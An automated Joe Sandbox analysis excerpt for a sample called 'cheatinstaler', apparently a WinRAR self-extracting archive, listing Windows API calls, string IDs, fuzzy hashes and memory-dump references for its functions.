                                                                                                  • API String ID: 1703294689-0
                                                                                                  APIs
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16BF895
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16BF89B
                                                                                                    • Part of subcall function 00007FF6C16C3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6C16D0811), ref: 00007FF6C16C3EFD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 3587649625-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6C16C274D), ref: 00007FF6C16C28A9
                                                                                                  • GetLastError.KERNEL32(?,00007FF6C16C274D), ref: 00007FF6C16C28B8
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2976181284-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1746051919-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1392018926-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: LoadString
                                                                                                  • String ID:
                                                                                                  • API String ID: 2948472770-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2976181284-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Item$RectText$ClientWindowswprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 402765569-0
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C16CEBAD,?,?,?,?,00007FF6C16C5752,?,?,?,00007FF6C16C56DE), ref: 00007FF6C16CEB5C
                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6C16CEB6F
                                                                                                  Similarity
                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                  • String ID:
                                                                                                  • API String ID: 1231390398-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1173176844-0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 588628887-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: af39ee99099a55e795e80951e1502b6695bf377bb292aa42fe2ae5656993095e
                                                                                                  • Instruction ID: fd230c09a97c71d4beb4164b6ffa3d70f08db5c5d62403dc8e2c0c7beaaa86dc
                                                                                                  • Opcode Fuzzy Hash: af39ee99099a55e795e80951e1502b6695bf377bb292aa42fe2ae5656993095e
                                                                                                  • Instruction Fuzzy Hash: 53D1D672B0868256EB688F2796442B977A5FB05B86F048035EBDD877A5CF3CE461B301
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017591355-0
                                                                                                  • Opcode ID: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
                                                                                                  • Instruction ID: 36d19c73f0f240365d56f32264b166b078cfcf7c03962b2abe132409fcc30631
                                                                                                  • Opcode Fuzzy Hash: fa91c3799828e3c7186940546e344b2356dc381c1e63a9425ea543ecc2eeea66
                                                                                                  • Instruction Fuzzy Hash: 9961D111B0D647C1FF64BE279C2427A9A91AF45BD7F148131EECDC6AC6EE7CE441A200
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16CE948: ReleaseSemaphore.KERNEL32 ref: 00007FF6C16CE974
                                                                                                    • Part of subcall function 00007FF6C16CE948: FindCloseChangeNotification.KERNELBASE ref: 00007FF6C16CE993
                                                                                                    • Part of subcall function 00007FF6C16CE948: DeleteCriticalSection.KERNEL32 ref: 00007FF6C16CE9AA
                                                                                                    • Part of subcall function 00007FF6C16CE948: CloseHandle.KERNEL32 ref: 00007FF6C16CE9B7
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16D1ACB
                                                                                                  Similarity
                                                                                                  • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1624603282-0
                                                                                                  • Opcode ID: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
                                                                                                  • Instruction ID: ba36441886d4524c6d7f7ed971185f80a053bbad27ce62237e03fe8e180f8568
                                                                                                  • Opcode Fuzzy Hash: f81b05313dfd5b5a73717daa6d384c08c9459244a7d30a6ec5ae517113eafb45
                                                                                                  • Instruction Fuzzy Hash: 9361E062B15A8596EF08EF66D5540BC7365FF41B81B284236EBED8BAC1CF68E4709300
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
                                                                                                  • Instruction ID: 61846bd090d3420bfc99de9b94696339f77fbba32105119249a8160f56654d3e
                                                                                                  • Opcode Fuzzy Hash: d7b1a399856acf99fdb305a598bd345408e38bb8b7611d952776f17d246575aa
                                                                                                  • Instruction Fuzzy Hash: 0D51C162A0868280EF14AF27D4553A96751FB86BC6F444136FEDD87396CF3DE486E340
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6C16D0811), ref: 00007FF6C16C3EFD
                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C16BE993
                                                                                                  Similarity
                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1011579015-0
                                                                                                  • Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                                  • Instruction ID: a49ce5a471473349887f16e4ff4b72f19700918a785411525823a4b14318cbc1
                                                                                                  • Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                                  • Instruction Fuzzy Hash: 85518F22A08A8681FB60DF26D44537D23A1FF85B86F440236FACD877A6DF2CD441E750
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: 60c8fe66f84878668f1e37175277eb608c06b9d2d44befc405cc34de4c74e42f
                                                                                                  • Instruction ID: ab939047dea406f390569ebb4352ab8240e5383d844da572ed75476ee6b94da3
                                                                                                  • Opcode Fuzzy Hash: 60c8fe66f84878668f1e37175277eb608c06b9d2d44befc405cc34de4c74e42f
                                                                                                  • Instruction Fuzzy Hash: F241D462B18A9182EF149E17AA1037AA255AB85BC1F448535EECC87F4ADF3CD5929340
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
                                                                                                  • Instruction ID: 190042b11f216e2a9bc57fea4a6a86a84b39d568d18338cc7e39fa77824638f7
                                                                                                  • Opcode Fuzzy Hash: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
                                                                                                  • Instruction Fuzzy Hash: 4741DF63A08B0680EF10AF2AE5653796361FB85BD9F044139EEDD87699DF3DE480D640
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 3947729631-0
                                                                                                  • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                                  • Instruction ID: 8a565399adac73e201b3c8f567b108f41a5ddc363b70bb87eaa31ffd2d1b13d1
                                                                                                  • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                                  • Instruction Fuzzy Hash: 0C41B122A1875282FB24DF279C502782261AF94B82F544536DACDC76E6DF3DEA41E7C0
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 680105476-0
                                                                                                  • Opcode ID: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
                                                                                                  • Instruction ID: 73a47172d6228e159a50cb0f1eb4716f769095f9e26f25fd4ba8aee88d748e0f
                                                                                                  • Opcode Fuzzy Hash: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
                                                                                                  • Instruction Fuzzy Hash: 3121AE22A0925195EB149E93B4002796250BF06BF1F680B31EFFE87BC1EE7CE491A340
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: 31b34ebacb9280de439ed9c8253ac234116577bf367a3ee86a8e065c3418b0aa
                                                                                                  • Instruction ID: c23b4c738114662cf32f6fc56c8e4abc46f069b6655eac17cb47c68bdfdf4429
                                                                                                  • Opcode Fuzzy Hash: 31b34ebacb9280de439ed9c8253ac234116577bf367a3ee86a8e065c3418b0aa
                                                                                                  • Instruction Fuzzy Hash: 2A217822B24582A2EB08EF62D5583F86365FF44786F944435E7DD876A2DF3CA5A4E300
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 3215553584-0
                                                                                                  • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                                  • Instruction ID: 3d373e12c116829058afabf060178db3c9edb818b098356e8bffa6df79e5ccbd
                                                                                                  • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                                  • Instruction Fuzzy Hash: 11119D76A0C78282F7109F92A84027972A4FF413C2F544135EAEDC7796DF3CE980AB40
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  • Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                                  • Instruction ID: d94e70d9af6f1ea881553e2ff05ac4ba7d791599a02eb3a7c14e09c2676c10da
                                                                                                  • Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                                  • Instruction Fuzzy Hash: 3C01A162B1868581EB119B2AE4452297361FF99791F409331E6DC47BA9DF2CE1409704
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16E1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6C16E1573,?,?,?,00007FF6C16E192A), ref: 00007FF6C16E162B
                                                                                                  • DloadProtectSection.DELAYIMP ref: 00007FF6C16E15C9
                                                                                                  Similarity
                                                                                                  • API ID: DloadHandleModuleProtectSection
                                                                                                  • String ID:
                                                                                                  • API String ID: 2883838935-0
                                                                                                  • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                                  • Instruction ID: ec450702fe57f0b14b8c4726641dd2e3b249c7d85a8bf17227a2e69e96b20697
                                                                                                  • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                                  • Instruction Fuzzy Hash: CA11BEA0E0854741FB609F17A8643B02350EF1534BF380534C9DDC62A6FF3CE5A5E650
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                                  • Instruction ID: b2450e8314e6f15495589f80d8ca1c6c3345e2e92350749f2fa3fa278bd19a2f
                                                                                                  • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                                  • Instruction Fuzzy Hash: 3FF06D90B1A20786FF545F6B9D113B412805F44B82F0C56B0CDCECE3C2EE2CE7816290
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF6C16C40BC: FindFirstFileW.KERNELBASE ref: 00007FF6C16C410B
                                                                                                    • Part of subcall function 00007FF6C16C40BC: FindFirstFileW.KERNEL32 ref: 00007FF6C16C415E
                                                                                                    • Part of subcall function 00007FF6C16C40BC: GetLastError.KERNEL32 ref: 00007FF6C16C41AF
                                                                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF6C16D0811), ref: 00007FF6C16C3EFD
                                                                                                  Similarity
                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1464966427-0
                                                                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                                  • Instruction ID: 3940b5db54bdf4b7854d6af9867ed0f0f3f5a4a54c88f8fac3e16ae421516981
                                                                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                                  • Instruction Fuzzy Hash: 5AF0A46250828285EF10BF76A1142B93760AB15BB5F149334EAFD473C7CE2CD444D744
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                                  • Instruction ID: 492b4202ac24671368ae304ad4bffd61938ed5700dbffa8b049fb1f51d2c789e
                                                                                                  • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                                  • Instruction Fuzzy Hash: 18F08C10F0920748FF646FB39C103B812915F847A2F085730DDEEC62C2DE2CE680A291
                                                                                                  APIs
                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF6C16C207E), ref: 00007FF6C16C20F6
                                                                                                  Similarity
                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                  • String ID:
                                                                                                  • API String ID: 2591292051-0
                                                                                                  • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                                  • Instruction ID: 3faf53ea4168729f48be6e61bf52eb013c2b867d96197ed1e489dbf5929ab00a
                                                                                                  • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                                  • Instruction Fuzzy Hash: 6BF0C222A0868285FF249F32E0557792761EB54B7BF584338EBFC815D5CF28D8A5E300
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: FileType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3081899298-0
                                                                                                  • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                                  • Instruction ID: e93af9bd0791ba9af22a0bbe25701c7d2357157f127e4de041d63e8aff357982
                                                                                                  • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                                  • Instruction Fuzzy Hash: 0ED01212E0A841C3DF10AB3BD86103C6360AF92736FA44770DAFEC16E1CE1D9496B311
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611563598-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                  • API String ID: 2659423929-3508440684
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                                  • String ID: rtmp
                                                                                                  • API String ID: 3587137053-870060881
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 1693479884-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3140674995-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1239891234-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3668304517-0
                                                                                                  APIs
                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C16EFAC4
                                                                                                    • Part of subcall function 00007FF6C16E7934: GetCurrentProcess.KERNEL32(00007FF6C16F0CCD), ref: 00007FF6C16E7961
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                  • String ID: *?$.
                                                                                                  • API String ID: 2518042432-3972193922
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                  • String ID:
                                                                                                  • API String ID: 1365068426-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .
                                                                                                  • API String ID: 0-248832578
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                  • String ID:
                                                                                                  • API String ID: 2169056816-0
                                                                                                  • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                                  • Instruction ID: 8bb6bd93126ed2f4cc23e71975b52665b09cf22156725bfb087e64dc6405a013
                                                                                                  • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                                  • Instruction Fuzzy Hash: B2118926A08B8595E761CF22E8103EA7360FF88B85F844135DACC83769DF3CE285C744
                                                                                                  Similarity
                                                                                                  • API ID: Version
                                                                                                  • String ID:
                                                                                                  • API String ID: 1889659487-0
                                                                                                  • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                                  • Instruction ID: 87fa44934095c9cac42924ea135bd6b9bf5884547dce9d874aafaf881bcfcfdf
                                                                                                  • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                                  • Instruction Fuzzy Hash: 96011775A086828AE724DF02E86077A37A2BB98316F600234E5DD83791DF3CE5009E10
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                  • Instruction ID: b55ff43e3593ebe6cda9f549b149de79449654801b769aa370b0863b7119834e
                                                                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                  • Instruction Fuzzy Hash: 9AB09220E17A02C2EB482F526C9225422A8BF48702FA88078C18C81330DE2C24B65711
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                  • Instruction ID: 3523ac9e02c5aac514e321283d69f5ca5e41c3026b2a3057fdf09ad3b9d833fd
                                                                                                  • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                  • Instruction Fuzzy Hash: 40F06272B182958BDBA8CF2AA85262977D0FB08381F948039D6CDC3B04DA3CD4618F14
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                                  • API String ID: 3668304517-727060406
                                                                                                  • Opcode ID: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
                                                                                                  • Instruction ID: d3ff8d6b3d3494a6ea2d8d858ae4ab0b82e240eb690b6e16b80a9dc189f1f98d
                                                                                                  • Opcode Fuzzy Hash: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
                                                                                                  • Instruction Fuzzy Hash: D241E676B05F0199EB009F62E8403E933A9EB48799F400276DADC87B69EF38D565D380
                                                                                                  Similarity
                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                  • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                                  • Instruction ID: bd94a898724056cbd30db7d25c2911b3d834675f9a3bb03be7a774397682efd2
                                                                                                  • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                                  • Instruction Fuzzy Hash: 1D211B61A09A0381FF64DF67EC656B423A5AF44783F540238CDDE827A1DE3CE565A350
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                                  • API String ID: 4097890229-4048004291
                                                                                                  • Opcode ID: 56c6116d5534ddc5b4079fdeed8715d081fed04d0e9eb28ce3c332ce1ff1d7ed
                                                                                                  • Instruction ID: ede54a8e7f5e9a88aa50db0ef7e0017faddefa3f0885c3bc7993f3dca3525142
                                                                                                  • Opcode Fuzzy Hash: 56c6116d5534ddc5b4079fdeed8715d081fed04d0e9eb28ce3c332ce1ff1d7ed
                                                                                                  • Instruction Fuzzy Hash: 2512E162B08A4280EF10EF6AD4601AD6371EB85B89F504236DBDD87BE9DF3CD546D344
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                  • API String ID: 431506467-1315819833
                                                                                                  • Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                                  • Instruction ID: d4b33e410a9b3395734951a203a2ce190ffa7952822cccea7b1401f6f1a3a72a
                                                                                                  • Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                                  • Instruction Fuzzy Hash: 0AB1CC62F0878285FB009FA6D4442BC2362AF85799F504235DEDDA6BDAEF3CE546D340
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                  • API String ID: 3215553584-2617248754
                                                                                                  • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                                  • Instruction ID: c14e8604c51307c9ea8fcd4979a87c4d24b12aaef4bbbd6c738c6885817b6751
                                                                                                  • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                                                  • Instruction Fuzzy Hash: 1241AD72A0AB4589EB00CF26E8517ED33A4EB18398F014636EEDC87B94DE3DD125D384
                                                                                                  Similarity
                                                                                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                                  • String ID: STATIC
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
